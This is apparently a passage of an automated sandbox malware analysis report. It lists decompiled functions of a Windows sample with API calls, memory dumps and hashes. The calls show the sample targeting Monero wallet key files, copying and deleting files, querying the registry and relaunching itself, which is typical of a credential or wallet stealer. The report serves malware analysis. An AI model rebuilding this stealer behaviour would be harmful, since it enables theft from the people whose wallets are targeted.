                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemset
                                • String ID: sP$sP$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 4047604823-3565788713
                                • Opcode ID: e6e9bd7fbddf9970db07724e214f22b6b7b055dcd0c99175ac86be17036d36f6
                                • Instruction ID: b4f8c86632e5abeeaea904b5dfe1d25147ec0efca8b340dfe9366d806349c020
                                • Opcode Fuzzy Hash: e6e9bd7fbddf9970db07724e214f22b6b7b055dcd0c99175ac86be17036d36f6
                                • Instruction Fuzzy Hash: 6D517DB0D0421EABDB14EB90DC85BEEBB74BF58304F5084A8E615761C1EB746E88CF58
                                Function 00507E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00507E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00507E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,012CBC08,00000000,00020119,?), ref: 00507E5E
                                • RegQueryValueExA.ADVAPI32(?,012DD6D8,00000000,00000000,000000FF,000000FF), ref: 00507E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00507E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0092dcb1f4ef202867f5c72b47700688134a39ce425fd23c5fc8acfbb8d96e9e
                                • Instruction ID: 53cd6c21a231cc0a4f458898b8daecef4a12ab7b136fcfd9676024c651162d82
                                • Opcode Fuzzy Hash: 0092dcb1f4ef202867f5c72b47700688134a39ce425fd23c5fc8acfbb8d96e9e
                                • Instruction Fuzzy Hash: 37114CB1A44209FBE700CB94DD4AFBFBBBCFB08B11F108159F605A7280D77868048BA1
                                Function 00509260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(012DDA70,?,?,?,0050140C,?,012DDA70,00000000), ref: 0050926C
                                • lstrcpyn.KERNEL32(0073AB88,012DDA70,012DDA70,?,0050140C,?,012DDA70), ref: 00509290
                                • lstrlen.KERNEL32(?,?,0050140C,?,012DDA70), ref: 005092A7
                                • wsprintfA.USER32 ref: 005092C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 2652b5b6caaf853618f63a142f90dcc1445166ccddd20c504884d52fc9d9eecb
                                • Instruction ID: 487cc14f86bbe30d4a008eb1181d3464501ba9ef2494991f40a05d16a22ed1dd
                                • Opcode Fuzzy Hash: 2652b5b6caaf853618f63a142f90dcc1445166ccddd20c504884d52fc9d9eecb
                                • Instruction Fuzzy Hash: 7C011AB5500108FFDB04DFECC98AEAE7BB9FB48351F108548F9498B245C639AA40DB95
                                Function 004F12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004F12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004F12F5
                                • RegCloseKey.ADVAPI32(?), ref: 004F12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 01b34146acdf691134ce1317b26fc526facf169167d71b81c492be7ea2c199de
                                • Instruction ID: 4c2e66159eddbc0b93c63aa236aed1bef5e311eed438b8f5fa121e2686ed85c5
                                • Opcode Fuzzy Hash: 01b34146acdf691134ce1317b26fc526facf169167d71b81c492be7ea2c199de
                                • Instruction Fuzzy Hash: 7A0131B9A40208BBEB00DFE0DC8AFAEB7B8EB48701F008159FA4597280D6759A018F55
                                Function 00506630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00506663
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00506726
                                • ExitProcess.KERNEL32 ref: 00506755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: c5d5e337bb2f2678fd40105cad5de211755d2b1abb08a5a5e8a22bc8af273f1d
                                • Instruction ID: 5e31664a67d1035641b782e2396d5c13f5daff19c6cf7596e4f91ac908a91837
                                • Opcode Fuzzy Hash: c5d5e337bb2f2678fd40105cad5de211755d2b1abb08a5a5e8a22bc8af273f1d
                                • Instruction Fuzzy Hash: 33314DB1901218ABDB14EB50DC8AFDEBB78BF94300F408188F255661D1DF746B48CF5A
                                Function 005087C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00510E28,00000000,?), ref: 0050882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00508836
                                • wsprintfA.USER32 ref: 00508850
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 2dc201f1b6455aae33e4205b1b6ac31f57749294a95fa8160a4823f0976087cc
                                • Instruction ID: 23ac964317f978bceec80068538d2d7c9f804dd9b03a3fd544395aecced3a07f
                                • Opcode Fuzzy Hash: 2dc201f1b6455aae33e4205b1b6ac31f57749294a95fa8160a4823f0976087cc
                                • Instruction Fuzzy Hash: 2B2130B1A40204BFEB04DF94DD4AFAEBBB8FB48701F108119F645A72C0C7799900CBA5
                                Function 00508D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0050951E,00000000), ref: 00508D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00508D62
                                • wsprintfW.USER32 ref: 00508D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 0e56dc33fbccb107a66819686c560aada2bffd55fbb776ebc6c805501afd7e8d
                                • Instruction ID: f000bb762dc42fd262dde45f4d83cc1fff2f1a5002a3a2050dd71ba7eacf0688
                                • Opcode Fuzzy Hash: 0e56dc33fbccb107a66819686c560aada2bffd55fbb776ebc6c805501afd7e8d
                                • Instruction Fuzzy Hash: FCE086B1A40208FBE700DB94DC0EE9977B8EB04702F004054FD4987280D9755E008B56
                                Function 004FA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 004FA3FF
                                • lstrlen.KERNEL32(00000000), ref: 004FA6BC
                                  • Part of subcall function 0050A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0050A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 004FA743
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 0c1b3f40f7b32b2aabe5e25ed16686f0443cc02d48b7a763c98aa4e2ce5b47bf
                                • Instruction ID: 93ce80d048d2eab7f52924fe291221c7d6f2eaf2697fa83fc90bab0a93626ecc
                                • Opcode Fuzzy Hash: 0c1b3f40f7b32b2aabe5e25ed16686f0443cc02d48b7a763c98aa4e2ce5b47bf
                                • Instruction Fuzzy Hash: 62E1FC72910209AADB04EBA4DC9AEEE7738BFA4300F50C559F516720D1EF346A49CB66
                                Function 004FD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FD481
                                • lstrlen.KERNEL32(00000000), ref: 004FD698
                                • lstrlen.KERNEL32(00000000), ref: 004FD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 004FD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: e6e8dc65938d0e796f916fea7547576c1e742ba411895db71d4682ae47374bf1
                                • Instruction ID: 93a6c4385626bdc9768ce584729f6bb1905cb25e9b82a9daa1e47d24136d8cb4
                                • Opcode Fuzzy Hash: e6e8dc65938d0e796f916fea7547576c1e742ba411895db71d4682ae47374bf1
                                • Instruction Fuzzy Hash: BA9135729102099BDB04FBA0DD9AEEE7738BF94300F508569F507B60D1EF346A49CB66
                                Function 004FD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0050A740: lstrcpy.KERNEL32(00510E17,00000000), ref: 0050A788
                                  • Part of subcall function 0050A9B0: lstrlen.KERNEL32(?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 0050A9C5
                                  • Part of subcall function 0050A9B0: lstrcpy.KERNEL32(00000000), ref: 0050AA04
                                  • Part of subcall function 0050A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0050AA12
                                  • Part of subcall function 0050A8A0: lstrcpy.KERNEL32(?,00510E17), ref: 0050A905
                                  • Part of subcall function 00508B60: GetSystemTime.KERNEL32(00510E1A,012D9AC8,005105AE,?,?,004F13F9,?,0000001A,00510E1A,00000000,?,012D8AC0,?,\Monero\wallet.keys,00510E17), ref: 00508B86
                                  • Part of subcall function 0050A920: lstrcpy.KERNEL32(00000000,?), ref: 0050A972
                                  • Part of subcall function 0050A920: lstrcat.KERNEL32(00000000), ref: 0050A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004FD801
                                • lstrlen.KERNEL32(00000000), ref: 004FD99F
                                • lstrlen.KERNEL32(00000000), ref: 004FD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 004FDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.2143466660.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                • Associated: 00000000.00000002.2143446926.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143466660.000000000073A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143625399.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143873017.00000000009F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143979579.0000000000B8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2143995377.0000000000B8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
